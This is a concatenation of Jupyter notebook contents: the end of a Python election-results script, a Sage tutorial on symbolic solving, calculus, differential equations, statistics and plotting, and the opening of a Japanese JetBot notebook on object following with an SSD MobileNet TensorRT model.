total_votes = total_votes + 1
# Extract the candidate name from each row
candidate_name = row[2]
# If the candidate does not match any existing candidate...
# (In a way, our loop is "discovering" candidates as it goes)
if candidate_name not in candidate_options:
# Add it to the list of candidates in the running
candidate_options.append(candidate_name)
# And begin tracking that candidate's voter count
candidate_votes[candidate_name] = 0
# Then add a vote to that candidate's count
candidate_votes[candidate_name] = candidate_votes[candidate_name] + 1
# Print the results and export the data to our text file
with open(file_to_output, "w") as txt_file:
# Print the final vote count (to terminal)
election_results = (
f"\n\nElection Results\n"
f"-------------------------\n"
f"Total Votes: {total_votes}\n"
f"-------------------------\n")
print(election_results, end="")
# Save the final vote count to the text file
txt_file.write(election_results)
# Determine the winner by looping through the counts
for candidate in candidate_votes:
# Retrieve vote count and percentage
votes = candidate_votes.get(candidate)
vote_percentage = float(votes) / float(total_votes) * 100
# Determine winning vote count and candidate
if (votes > winning_count):
winning_count = votes
winning_candidate = candidate
# Print each candidate's voter count and percentage (to terminal)
voter_output = f"{candidate}: {vote_percentage:.3f}% ({votes})\n"
print(voter_output, end="")
# Save each candidate's voter count and percentage to text file
txt_file.write(voter_output)
# Print the winning candidate (to terminal)
winning_candidate_summary = (
f"-------------------------\n"
f"Winner: {winning_candidate}\n"
f"-------------------------\n")
print(winning_candidate_summary)
# Save the winning candidate's name to the text file
txt_file.write(winning_candidate_summary)
###Output
_____no_output_____ |
src/Lecture6/notebook/.ipynb_checkpoints/8-SageCalculus-modified-checkpoint.ipynb | ###Markdown
Symbolic expressions**Reference:** [[1](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.html)]Last time we saw the basics of symbolic expressions:* How to define and manipulate symbolic expressions* How to introduce new variables (in the Mathematical sense) with `var()`* How to solve equations and inequalities* Some of the Mathematical constants that are included in Sage, and how to approximate them using `n()`Here are some examples to remind you of these basic things:
###Code
var('y', 'z') # Define new variables (x is already defined by Sage)
f = x^2 + pi
g = y^2 + y - 2 > 0
print( solve(f==0, x) )
print( solve(z^2 - f, z) )
print( solve(g, y) )
print( 2*pi + e, "is approximately", n(2*pi + e) )
###Output
[
x == -sqrt(-pi),
x == sqrt(-pi)
]
[
z == -sqrt(pi + x^2),
z == sqrt(pi + x^2)
]
[[y < -2], [y > 1]]
2*pi + e is approximately 9.00146713563863
###Markdown
Now we will see some more details about solving equations and manipulating their solutions. Solving equations and inequalities**Reference** [[1](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.html)] for the details of `solve()` and `find_root()`, [[2](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/relation.htmlsolving)] for examples.Other than equations and inequalities, we can also solve systems: it is enough to give Sage a list of expressions and a list of variables with respect to which we want to solve. For example the system\begin{align*} \begin{cases} x + y = 2 \\ 2x - y = 6 \end{cases}\end{align*}Can be solved as
###Code
solve([x+y == 2, 2*x - y == 6], [x,y])
###Output
_____no_output_____
###Markdown
**Exercise.** Find the intersection of the circle of radius $2$ centered in the origin and the parabula of equation $y=x^2-2x+1$. **Solution:** the system is\begin{align*} \begin{cases} y^2 = x^2 - 2x +1\\ x^2 + y^2 = 4 \end{cases}\end{align*}
###Code
var('y')
eq1 = y^2 == x^2-2*x+1
eq2 = x^2 + y^2 == 4
solve([eq1, eq2], [x,y])
###Output
_____no_output_____
###Markdown
The set of solutionsOne would expect the result of `solve()` to be a list of solutions, but it is actually a list of expressions (technically it is not a list but a different type of Python collection, but this is not so important)
###Code
solutions = solve(x^2-9 == 0, x)
solutions[0] # This is the expression 'x == -3'
# Using rhs() explained below
print(solutions[0].rhs())
###Output
-3
###Markdown
To read the actual solution without the `x ==` part you can use the `rhs()` or `lhs()` functions, which can be applied to any expression containing a relation operator (like `==`, `=`...) and return the *right hand side* and *left hand side* of the expression, respectively
###Code
f = x^2+y <= 2-y
print("rhs:", f.rhs())
print("lhs:", f.lhs())
###Output
rhs: -y + 2
lhs: x^2 + y
###Markdown
When you solve an inequality or a system, the set of solutions can be more complicated to describe. In this case the result is a list containing lists of expressions that have to be `True` at the same time. It is easier to explain with an example:
###Code
print("Simple inequality:", solve(x^2-9 > 0, x))
print("System of inequalities:\n", solve([x^2-9 > 0, x < 6], x))
###Output
Simple inequality: [[x < -3], [x > 3]]
System of inequalities:
[
[3 < x, x < 6],
[x < -3]
]
###Markdown
In the last example (system of inequalities), Sage is telling us that the system\begin{align*} \begin{cases} x^2-9 > 9 \\ x < 6 \end{cases}\end{align*}has two solutions:* $x$ is between $3$ and $6$;* $x$ is less than $-3$.Since in Sage (and in Python) expressions can have at most on relational operator like `<`, the first solution requires two expressions to be described. Hence the "list of lists". **Exercise.** In the first exercise you were asked to solve a system of equations, but some of its solutions were complex numbers. Select only the real solutions and print them as pairs $(x,y)$.
###Code
# We use a different equation because the first exercise only
# had real solutions.
var('y')
eq1 = y^2 == x^2-2*x+5
eq2 = x^2 + y^2 == 4
solutions = solve([eq1, eq2], [x,y])
print("All solutions:")
print(solutions)
for s in solutions:
#print("One solutions is:", s)
x0 = s[0].rhs()
y0 = s[1].rhs()
if x0 in RR and y0 in RR:
print((x0, y0))
###Output
All solutions:
[
[x == (-1/2*I + 1/2), y == -sqrt(1/2*I + 4)],
[x == (-1/2*I + 1/2), y == sqrt(1/2*I + 4)],
[x == (1/2*I + 1/2), y == -sqrt(-1/2*I + 4)],
[x == (1/2*I + 1/2), y == sqrt(-1/2*I + 4)]
]
###Markdown
When solving a system of equations (not inequalities), you can use the option `solution_dict=True` to have the solutions arranged as a *dictionary*, which is a type of Python collection that we did not treat in this course
###Code
solve([x+y == 2, 2*x - y == 6], [x,y], solution_dict=True)
###Output
_____no_output_____
###Markdown
Alternative method for real roots: `find_root()`The `solve()` method is very useful when solving *symbolic* equations, for example when you have two variables and you want to solve for one of them in terms of the other. However, it does not always find explicit solutions.When you want to find an explicit, even if approximate, solution, it can be better to use `find_root()`. This function works *numerically*, which means that it finds an approximation of the root. It only works for real solutions and you need to specify an interval where you want the root to be searched:
###Code
f = e^x + x - 10
print("Using solve():\n", solve(f, x))
print("Using find_root():", f.find_root(0,10))
###Output
Using solve():
[
x == -e^x + 10
]
Using find_root(): 2.070579904980303
###Markdown
Evaluating functionsIf an expression contains only one variable you can evaluate it easily, even if it is not a function.
###Code
var('y')
f = x^2-3
g = x > x^2
print(f(2))
print(g(3+y))
###Output
1
y + 3 > (y + 3)^2
###Markdown
If an expression contains more than one variable, you can specify a value for each of them and they will be substituted in alphabetic order. You can also specify a value only for some of the variables.
###Code
var('y','z')
f = y*z^2 - y == z
print(f(2, 0))
print(f(z = 2))
###Output
-2 == 0
3*y == 2
###Markdown
Symbolic computationsSage can understand and simplify symbolic expressions such as sums (finite or infinite) and products. In the following cell, we compute the following sums using the [`sum()`](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.htmlsage.symbolic.expression.Expression.sum) function:\begin{align*} \begin{array}{llcc} (1) & \sum_{k=0}^nk &=&\frac{n^2+n}{2}\\ (2) & \sum_{k=0}^nk^4 &=&\frac{6n^5+15n^4+10n^3-n}{30}\\ (3) & \sum_{k=0}^n\binom nk &=& 2^n\\ (4) & \sum_{k=0}^\infty \frac1{k^2} &=& \frac{\pi^2}{6} \end{array}\end{align*}Recall that $\binom nk=\frac{n!}{k!(n-k)!}$
###Code
var('k', 'n') # Remember to declare all variables
s = []
s.append( sum(k, k, 0, n) )
s.append( sum(k^4, k, 0, n) )
s.append( sum(binomial(n,k), k, 0, n) )
s.append( sum(1/k^2, k, 1, infinity) )
for i in range(len(s)):
print("({}) {}".format(i+1, s[i]))
###Output
(1) 1/2*n^2 + 1/2*n
(2) 1/5*n^5 + 1/2*n^4 + 1/3*n^3 - 1/30*n
(3) 2^n
(4) 1/6*pi^2
###Markdown
An alternative notation is `expression.sum(k, a, b)`. There is an analogous [`prod()`](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.htmlsage.symbolic.expression.Expression.prod) for products.
###Code
(x^2).prod(x, 1, n)
###Output
_____no_output_____
###Markdown
Sometimes Sage tries to keep an expression in its original form without expanding out sums and products. To change this behavior you can use the [`expand()`](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.htmlsage.symbolic.expression.Expression.expand) function:
###Code
f = (x+1)^2 - (x-1)^2
print(f)
print(f.expand())
###Output
(x + 1)^2 - (x - 1)^2
4*x
###Markdown
The Symbolic Ring**Reference:** [[3](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/ring.html)]The symbolic expressions that we have seen so far live in a ring called *symbolic ring* and denoted by `SR` in Sage. This ring works like the ring `ZZ` of integers or `RR` of reals numbers. In particular, you can define matrices and other objects using it as a "basis".
###Code
var('a', 'b', 'c', 'd')
M = matrix([[a,b], [c,d]])
print(M.determinant())
polring.<x> = SR[]
f = x^2 + 2*a*x + a^2
print(f.roots())
###Output
-b*c + a*d
[(-a, 2)]
###Markdown
**Exercise.** Compute the eigenvalues of the matrix\begin{align*}\begin{pmatrix}\cos \alpha & \sin \alpha\\-\sin\alpha & \cos \alpha\end{pmatrix}\end{align*}
###Code
var('a')
M = matrix([[cos(a), sin(a)], [-sin(a), cos(a)]])
M.eigenvalues()
lam = M.eigenvalues()[0]
print(lam(pi/2))
###Output
-I
###Markdown
Calculus**Reference:** [[4](https://doc.sagemath.org/html/en/reference/calculus/index.html)] for an overview, but most functions are described in [[1](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.html)] Limits and series**References:** [[5](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/calculus.htmlsage.calculus.calculus.limit)] for limits, [[6](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.htmlsage.symbolic.expression.Expression.series)] for seriesYou can compute limits
###Code
var('x')
f = sin(x)/x
#print(f(0)) # This one gives an error
print( f.limit(x=0) )
print( (e^(-x)).limit(x=-infinity) )
###Output
1
+Infinity
###Markdown
**Exercise.** Compute the constant $e$ using a limit.
###Code
expression = (1+x/n)^n
expression.limit(n=infinity)
###Output
_____no_output_____
###Markdown
You can also specify a direction for the limit. If you don't, Sage assumes that you want to take a two-sided limit.
###Code
f = abs(x)/x # 1 if x>0, -1 if x<0
print( f.limit(x=0) ) # undefined
print( f.limit(x=0, dir="+") )
print( f.limit(x=0, dir="-") )
plot(f)
f = 1/x^2
print( f.limit(x=0) )
print( f.limit(x=0, dir="+") )
print( f.limit(x=0, dir="-") )
plot(f, (x, -10, 10), ymax = 10, ymin = -10)
###Output
+Infinity
+Infinity
+Infinity
###Markdown
There is also the alternative notation `limit(f, x, dir)` which does the same as `f.limit(x, dir)`. You can also compute series expansions up to any order. **Watch out:** the notation uses `==` instead of `=` as `limit()` does.
###Code
f = e^x
g = sin(x) - 2*cos(x)
h = log(x)
#print(f.series(x==0, 5))
#print(g.series(x==0, 7))
print(h.series(x==1, 4))
print((sin(x)^2*cos(x)).series(x==0, 6))
###Output
1*(x - 1) + (-1/2)*(x - 1)^2 + 1/3*(x - 1)^3 + Order((x - 1)^4)
1*x^2 + (-5/6)*x^4 + Order(x^6)
###Markdown
Derivatives**References:** [[7](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.htmlsage.symbolic.expression.Expression.derivative)] and [[8](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/functional.htmlsage.calculus.functional.derivative)] for derivatives, [[9](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/functions.htmlsage.calculus.functions.jacobian)] for the Jacobian matrix and [[10](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.htmlsage.symbolic.expression.Expression.hessian)] for the Hessian. When computing derivatives, you need to specify with respect to which variables you want to derive, except in case there is only one.
###Code
var('y')
print( (x^2+2*y^4).derivative(y) ) # Alternative: derivative(f, y)
print( (2*x^3-x+2).derivative() )
###Output
8*y^3
6*x^2 - 1
###Markdown
You can also compute higher order derivatives:
###Code
print( (x^3).derivative(x, x) ) # Same as (x^3).derivative(x, 2)
f = x^7*y^2 + x^4*y^2 - 2*x^3 + x^2*y^5 + y + 2
print( f.derivative(x, x, y) ) # Twice in x, once in y
print( f.derivative(x, 4, y, 2) ) # 4 times in x, twice in y
###Output
6*x
84*x^5*y + 10*y^4 + 24*x^2*y
1680*x^3 + 48
###Markdown
Jacobian and Hessian matrices are also easy to compute:
###Code
f = (-x^2 + 2*x*y, y^3, x+y+x*y)
print( jacobian(f, [x,y]), "\n" )
g = x^2 + x*y + y^3 -2*x*y^2 -3
print( g.hessian() )
###Output
[-2*x + 2*y 2*x]
[ 0 3*y^2]
[ y + 1 x + 1]
[ 2 -4*y + 1]
[ -4*y + 1 -4*x + 6*y]
###Markdown
*Note:* the notation `f.jacobian([x,y])` is also valid, but only if you specify that `f` is vector by declaring it as `f = vector([...])`. Integrals**References:** [[11](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/integration/integral.html)] for symbolic integration and [[12](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/integration.html)] for numerical methods.You should remember from high school or from your first calculus/analysis course that derivatives are easy, but integrals are hard.When using a computer software to solve your integrals, you have two choices:1. You can try to compute a primitive function exactly, and then (if you are computing a definite integral) substitute the endpoints of your integration interval to get the result. We can call this *symbolic integration*.2. You can get an *approximated* result with a *numerical method*. This method always gives some kind of result, but it cannot be used to compute indefinite integrals.Sage can do both of these things, although people that work in numerical analysis and use often the second method tend to prefer other programs, such as Matlab (or its open-source clone Octave). Symbolic integrationSymbolic integrals work more or less like derivatives. You must specify an integration variable, but the endpoints of the integration interval are optional. If they are not given you get an indefinite integral.
###Code
var('a', 'b')
f = x + sin(x)
print( f.integral(x) ) # Alternative: integral(f, x)
print( f.integral(x, -10, 10) )
print( f.integral(x, 0, pi) )
###Output
1/2*x^2 - cos(x)
0
1/2*pi^2 + 2
###Markdown
Your endpoints can also be $\pm\infty$:
###Code
print( integral(e^(-x), x, 0, infinity) )
print( integral(e^(-x^2), x, -infinity, infinity) )
###Output
1
sqrt(pi)
###Markdown
The last function is also an example of an integral that perhaps you might want to compute numerically. In fact:
###Code
print( integral(e^(-x^2), x) )
print( integral(e^(-x^2), x, 1, 2) )
###Output
1/2*sqrt(pi)*erf(x)
1/2*sqrt(pi)*erf(2) - 1/2*sqrt(pi)*erf(1)
###Markdown
Here `erf(x)` denotes the [error function](https://en.wikipedia.org/wiki/Error_function). Numerical integrationIn order to get an explicit value for the computations above, we can use a *numerical* method.The word "numerical" does not have much to do with numbers, but it refers to the fact that we are trying to compute explicit results rather than symbolic or algebraic ones. [Numerical analysis](https://en.wikipedia.org/wiki/Numerical_analysis) is the branch of mathematics that studies methods to approximate computations over the real or complex numbers. With these methods there is usually a trade-off between speed and precision.The Sage function [`numerical_integral()`](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/integration.htmlsage.calculus.integration.numerical_integral) takes as a parameter a real-valued one-variable function and the integration endpoints, and it returns both an approximate value for the integral and an error estimate.
###Code
numerical_integral(e^(-x^2), 1, 2)
###Output
_____no_output_____
###Markdown
The result above means, in symbols\begin{align*}\int_1^2 e^{-x^2}\mathrm dx = 0.13525725794999466 \pm 1.5016572202374808\times 10^{-15}\end{align*}There is also a [`monte_carlo_integral()`](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/integration.htmlsage.calculus.integration.monte_carlo_integral) method for functions with more than one variable. **Exercise.** Compute the area of the ellipse of equation $y^2+\left(\frac x3\right)^2=1$. **Solution:** First, rewrite the equation as:\begin{align*}y = \sqrt{1- \left(\frac{x}{3}\right)^2}\end{align*}
###Code
y = sqrt(1-(x/3)^2)
show(plot(y, xmin=-3.1, xmax=3.1, ymin=-0.2, ymax=1.1))
integral(y, x, -3, 3)
###Output
_____no_output_____
###Markdown
Differential equations**Reference:** [[13](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/desolvers.html)]A [differential equation](https://en.wikipedia.org/wiki/Differential_equation) is an equation involving an unknwon function and its derivatives. They can be of two kinds: *ordinary* differential equations ([ODE](https://en.wikipedia.org/wiki/Ordinary_differential_equation)) and *partial* differential equations ([PDE](https://en.wikipedia.org/wiki/Partial_differential_equation)). The latter involve multivariate functions and their partial derivatives.Differential equations are in general hard to solve *exactly* (or *symbolically*): even a simple equation of the form $f'(x)=g(x)$, where $g(x)$ is someknown function, requires solving the integral $\int g(x)\mathrm{d}x$ in order to find $f$, which as we know is not always easy!Theoretical results on differential equations usually ensure the existence and/or uniquess of a solution under certain conditions, but in general they do not give a way to solve them. There exits many methods to find approximate solutions, and some of them are implemented in Sage as well (see [[13](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/desolvers.html)]). However we will focus on the simple ODEs that can be solved exactly.Let's start with a simple example. Let's find all functions $f(x)$ such that $f'(x)=f(x)$. In order to do so, we need to use the `function()` construct, which allows us to define an "unknwon" function inside Sage, like we define variables with `var()`.
###Code
var('x')
function('f')
equation = derivative(f(x)) == f(x)
desolve(equation, f(x)) # f(x) is the unknown function
###Output
_____no_output_____
###Markdown
As you can expect, they are all the functions $Ce^x$ for some constant $C$. The constant $C$ plays the same role as the constant in the solution of an integral, but in this case Sage writes it explicitly.We can also specify *initial conditions* for our function. For example we can impose that $f(0)=3$ as follows:
###Code
desolve(equation, f(x), (0,3))
###Output
_____no_output_____
###Markdown
You can also solve *second order* equations, that is equations where the second derivative also appears. In this case if you want to specify an initial condition you should write the triple of values $(x_0, f(x_0), f'(x_0))$.
###Code
equation = derivative(f(x), x, 2) + x*derivative(f(x)) == 1
desolve(equation, f(x), (0, 0, 0))
###Output
_____no_output_____
###Markdown
**Exercise.** Use Sage to find out the functions $f(x)$ that satisfy\begin{align*} \begin{array}{rlcrl} (A) & \begin{cases} f(0) &= 1\\ f'(0) &= 0\\ f''(x) &= -f(x) \end{cases} & \qquad \qquad & (B) & \begin{cases} f(0) &= 0\\ f'(0) &= 1\\ f''(x) &= -f(x) \end{cases} \end{array}\end{align*}
###Code
eq = derivative(f(x), x, 2) == -f(x)
conditions1 = (0,1,0)
conditions2 = (0,0,1)
print( desolve(eq, f(x), conditions1) )
print( desolve(eq, f(x), conditions2) )
print( desolve(eq, f(x)) )
###Output
cos(x)
sin(x)
_K2*cos(x) + _K1*sin(x)
###Markdown
A real-world exampleDifferential equations have countless applications in Science, so it would be a shame not to see at least a simple one.Consider an object moving with constant acceleration $a$. Its velocity at time $t$ is described by the formula $v(t) = v(0) + at$. For example an object falling from the sky has acceleration $g\sim 9.8 m/s^2$ towards the ground, so its velocity is $v(t) = -gt$.However in the real world you need to take into account the air's resistance, which depends (among other things) on the velocity of the object. In this case the acceleration $a(t)$ is not constant anymore, and it satisfies an equation of the form $a(t)=-g -kv(t)$, where $k$ is some constant that may depend on the shape and mass of the object (in practice it may be more complicated than this).Since the acceleration is the derivative of the velocity, we have a differential equation\begin{align*} v'(t) = -g -kv(t)\end{align*}and we can try to solve it with Sage!
###Code
var('t')
function('v')
g = 9.8
k = 1.5
conditions = (0, 0) # Start with velocity 0
sol = desolve(derivative(v(t)) == -g -k*v(t), v(t), conditions)
#plot(sol, xmin=0, xmax = 100)
###Output
_____no_output_____
###Markdown
If you want to solve this equation symbolically (that is, keeping $g$ and $k$ in symbols) you need to specify that $t$ is the *independent variable* of the equation:
###Code
var('t', 'g', 'k')
function('v')
conditions = (0, 0) # Start with velocity 0
desolve(derivative(v(t)) == -g -k*v(t), v(t), conditions, ivar=t)
###Output
_____no_output_____
###Markdown
Basic data analysis and visualization Statistics**References:** [[14](https://doc.sagemath.org/html/en/reference/stats/sage/stats/basic_stats.html)]Sage includes the most basic functions for statistical analysis.
###Code
L = [1, 2, 3, 3, -6, -2, 4, -1, 0, 2, 3, -4, 0]
print("Values:\t", L)
print("Mean:\t\t\t", mean(L))
print("Median:\t\t\t", median(L))
print("Mode:\t\t\t", mode(L))
print("Standard deviation:\t", std(L))
print("Variance:\t\t", variance(L))
print("Moving average (5):", moving_average(L,5))
###Output
Values: [1, 2, 3, 3, -6, -2, 4, -1, 0, 2, 3, -4, 0]
Mean: 5/13
Median: 1
Mode: [3]
Standard deviation: 2*sqrt(29/13)
Variance: 116/13
Moving average (5): [3/5, 0, 2/5, -2/5, -1, 3/5, 8/5, 0, 1/5]
###Markdown
You can also compare your data to a probability distribution, see [this page](https://doc.sagemath.org/html/en/reference/probability/sage/probability/probability_distribution.html). If you need to do more advanced statistics you should consider using [R](https://www.r-project.org/); you can also use it inside Sage. Plotting**Reference:** [[15](https://doc.sagemath.org/html/en/reference/plotting/index.html)], more specifically the subsection [[16](https://doc.sagemath.org/html/en/reference/plotting/sage/plot/plot.html)].Some Sage objects can be plotted:
###Code
f = sin(x)
plot(f)
###Output
_____no_output_____
###Markdown
Sage's plotting functions are based on Python's [matplotlib](https://matplotlib.org/).You can give a number of options to adjust the aspect of your plot, see [here](https://doc.sagemath.org/html/en/reference/plotting/sage/plot/plot.htmlsage.plot.plot.plot). Let's see some of them:
###Code
f = sin(x)
p = plot(f,
-2*pi, 2*pi, # bounds for x
ymin = -1.1, ymax = 1.1, # bounds for y
color = "red",
title = "The sin function",
)
print("hello")
show(p)
###Output
hello
###Markdown
Some of the options are not described precisely in Sage's documentation, but you can find them on [matplotlib's documentation](https://matplotlib.org/stable/contents.html). You can find many examples online for adjusting your plot as you like! If you need to plot more than one object at the time, you can sum two plots and show them together with `show()`:
###Code
cosine = plot(cos(x), (x,-pi/2,pi/2), color="red")
exponential = plot(exp(x), (x,-2,0.5))
show(cosine + exponential) # works like print()
###Output
_____no_output_____
###Markdown
Finally, there are other types of plots that you can use, like [scatter plots](https://doc.sagemath.org/html/en/reference/plotting/sage/plot/scatter_plot.htmlsage.plot.scatter_plot.scatter_plot) and [bar charts](https://doc.sagemath.org/html/en/reference/plotting/sage/plot/bar_chart.htmlsage.plot.bar_chart.bar_chart). You can also add [text](https://doc.sagemath.org/html/en/reference/plotting/sage/plot/text.htmlsage.plot.text.text) to your plot:
###Code
b = bar_chart(range(1,10))
s = scatter_plot([(1,5), (4,2), (8,8), (4,7)],
marker = "*", # symbol
markersize = 100,
edgecolor = "green",
facecolor = "red"
)
t = text("wow, such plot!", (1, 8), color="black", fontsize=20)
show(b + s + t)
###Output
_____no_output_____
###Markdown
Interpolation**References:** [[17](https://doc.sagemath.org/html/en/reference/polynomial_rings/sage/rings/polynomial/polynomial_ring.htmlsage.rings.polynomial.polynomial_ring.PolynomialRing_field.lagrange_polynomial)] and [[18](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/interpolation.html)].When you need to work with a discrete set of data, like measurements of real-world quantities, it can be useful to visualize a "smoothed out" version of this data, for example by plotting a function that approximates it.One way to do so is finding the lowest-degree polynomial that passes through all your points. This is called [Lagrange Polynomial](https://en.wikipedia.org/wiki/Lagrange_polynomial).
###Code
points = [ (0,1), (1,2), (1.5,0), (2,4), (3,5) ]
polring.<x> = QQ[] # you need to specify a polynomial ring
lp = polring.lagrange_polynomial(points)
show(scatter_plot(points, facecolor="red")
+ plot(lp, 0, 3) # slightly different notation for polynomials
+ text(lp, (1,8), color="black")
)
###Output
_____no_output_____
###Markdown
One can compute the Lagrange Polynomial over any base ring, and it has the advantage that it is a very "nice" function (continuous and differentiable as much as you like, with easily computable derivatives and primitives).However, it does not always give you good approximation of your data:
###Code
R = [x/10 for x in range(-10,10)]
L = [1/(1+25*x^2) for x in R]
points = [(R[i], L[i]) for i in range(len(L))]
polring.<x> = RR[]
lp = polring.lagrange_polynomial(points)
show(plot(lp, -0.92, 0.82) + scatter_plot(points))
###Output
_____no_output_____
###Markdown
This particular example is called [Runge's phenomenon](https://en.wikipedia.org/wiki/Runge%27s_phenomenon). For a better approximation you can use a [spline](https://en.wikipedia.org/wiki/Spline_(mathematics)), which is a *piecewise* polynomial function:
###Code
show(plot(spline(points), -1, 1) + scatter_plot(points))
###Output
_____no_output_____ |
notebooks/object_following/01_live_demo.ipynb | ###Markdown
Object Following - 物体追跡このノートブックでは、JetBotで物体を追跡する方法を示します。 collision avoidanceをベースに、「free(直進する)」時に物体を追跡します。 物体検出に使うモデルは一般的な90種類のオブジェクトの画像を分類した[COCOデータセット](http://cocodataset.org)を事前にトレーニングしたssd_mobilenet_v2モデルを利用します。 このモデルはTensorRTに変換したものを使用しますが、JetPackバージョンによってTensorRTのバージョンが異なるため、変換時のTensorRTバージョンと同一の実行環境である必要があります。追跡可能な物体はCOCOデータセットで学習している物体となります。* 人(インデックス1)* カップ(インデックス47)その他多数あります(クラスインデックスの完全なリストについては、[ラベルファイル](https://github.com/tensorflow/models/blob/master/research/object_detection/data/mscoco_complete_label_map.pbtxt)で確認できます)。 インデックス0はbackgroundになります。通常、分類・検出するモデルでは「未検出」という状態を持つためにbackgroundラベルが使われています。 学習済みモデルは[Tensorflow Object Detection API](https://github.com/tensorflow/models/tree/master/research/object_detection)で公開されているものをベースに予めTensorRT化してあるものを使います。``Tensorflow Object Detection API``を使って自前のデータをデスクトップPCやクラウドサーバーで学習することも出来ます。ssd_mobilenet_v2_cocoをTensorRTに変換することにより、物体検出モデルの実行が非常に高速になり、Jetson Nanoでリアルタイムに実行できるようになります。ただし、このノートブックではCOCOデータセットからのトレーニングや他の最適化に関する手順は実行しません。また、TensorRTはバージョンによりAPIが頻繁に変更されているため、他のJetPackバージョンで動作していたssd_mobilenet_v2_coco.engineは利用できません。> このノートブックはJetson Nano 4GB JetPack 4.3で作られたJetBotで動作します。 > Jetson Nano 2GB (JetPack 4.4以降)とJetson Nano 4GB JetPack 4.4以降では動作確認していません。まずは始めてみましょう。 カメラの準備カメラを初期化しましょう。物体検出モデルは300x300ピクセルの画像を入力とするため、カメラ解像度を300x300に設定します。> 内部的には、CameraクラスはGStreamerを使用してJetson Nanoのイメージシグナルプロセッサ(ISP)を利用しています。これはCPUでリサイズ処理を実行する場合とは比較にならないほど超高速です。
###Code
########################################
# 利用するライブラリを読み込みます。
########################################
from jetbot import Camera # JetBot用に用意したカメラライブラリを利用します。
########################################
# カメラを有効化します。
# 画像はwidthとheightで指定したピクセルサイズにリサイズされます。
# ssd_mobilenet_v2_cocoは300x300の入力層のため、カメラ画像は300x300にリサイズします。
# fpsのデフォルトは21ですが、カメラフレーム更新に連動して推論を実行するようにコーディングしているため、
# 処理が重くなってしまいます。そのためfpsを小さく設定します。
########################################
camera = Camera(width=300, height=300, fps=5)
###Output
_____no_output_____
###Markdown
事前トレーニング済みのSSDエンジンを使用する[ObjectDetector](https://github.com/NVIDIA-AI-IOT/jetbot/blob/master/jetbot/object_detection.py)クラスをインポートして、``ssd_mobilenet_v2_coco.engine``をロードします。Jetpack4.3向けの[ssd_monbilenet_v2_coco.engine](https://drive.google.com/file/d/1KjlDMRD8uhgQmQK-nC2CZGHFTbq4qQQH/view) をダウンロードし、JupyterLabの本Notebookと同じフォルダに``ssd_monbilenet_v2_coco.engine``をアップロードします。 SSD MobileNet V2モデルを読み込む
###Code
########################################
# 利用するライブラリを読み込みます。
########################################
from jetbot import ObjectDetector # JetBot用に用意した物体検出ライブラリを利用します。
########################################
# TensorRTの物体検出モデルを読み込みます。
########################################
model = ObjectDetector('ssd_mobilenet_v2_coco.engine')
###Output
_____no_output_____
###Markdown
内部的には、``ObjectDetector``クラスはTensorRT Python APIを使用してモデルを実行します。また、モデルへの入力の前処理や、検出されたオブジェクトの解析も行います。 現時点では、``jetbot.ssd_tensorrt``パッケージを使用して作成されたモデルでのみ機能します。このパッケージには、モデルをTensorflowオブジェクト検出APIから最適化されたTensorRTエンジンに変換するためのユーティリティが含まれています。 次に、カメラ入力を使用してネットワークを実行してみましょう。 デフォルトでは ``ObjectDetector``クラスはカメラが生成する``bgr8``フォーマットを期待しています。 しかし、別のフォーマットを入力に使う場合は、デフォルトの前処理関数をオーバーライドして変更できます。
###Code
########################################
# 利用するライブラリを読み込みます。
########################################
import cv2
########################################
# 物体検出はTensorflowで学習されたモデルを使っています。このモデルは学習時にRGB画像フォーマットで学習されています。
# そのモデルをTensorRTモデルに変換したものがssd_mobilenet_v2_coco.engineです。
# 物体検出モデルの入力データはRGBフォーマットに変換する方が精度がよくなりますが、
# BGR->RGB変換をObjectDetectorクラスが実行しているため、
# このノートブックにおける物体検出の入力データはOpenCVカメラ画像のBGRフォーマットのまま渡すことになります。
########################################
detections = model(camera.value)
print(detections) # 推論結果を表示します。
###Output
_____no_output_____
###Markdown
カメラ画像にCOCOオブジェクトがある場合、その情報は``detections``変数に格納されています。 テキスト領域に検出を表示する次のコードを使用して、検出されたオブジェクトの情報をテキストエリアに表示します。
###Code
########################################
# 利用するライブラリを読み込みます。
########################################
from IPython.display import display
import ipywidgets.widgets as widgets
detections_widget = widgets.Textarea() # テキストウィジェットを作成します。
detections_widget.value = str(detections) # テキストウィジェットに検出したオブジェクトの情報を反映します。
display(detections_widget) # テキストウィジェットを表示します。
###Output
_____no_output_____
###Markdown
カメラ画像で検出された各オブジェクトのラベルID、信頼度、境界ボックスの座標が表示されます。ミニバッチ学習時に複数の画像を一度に学習したなごりで、予測時にも一度に複数の画像を入力として期待するモデルに仕上がっています。 今回は1台のカメラしか使わないため、モデルの入力には1枚の画像を持つ配列が使われています。 最初の画像で検出された最初のオブジェクトのみを表示するには、次のように呼び出すことができます。> オブジェクトが検出されない場合、エラーになるため、try-exceptでエラーハンドリングします
###Code
image_number = 0 # 推論時に配列で与えた最初の画像を表す配列のインデックス番号。推論時は1枚の画像しか与えていないため、0固定値。
object_number = 0 # 検出した物体の情報を持つ配列から、取り出したい配列のインデックス番号。複数の物体が検出された場合は0以外もあり得る。検出しなかった場合、配列は存在しない。
try:
print(detections[image_number][object_number])
except:
print("object not found")
###Output
_____no_output_____
###Markdown
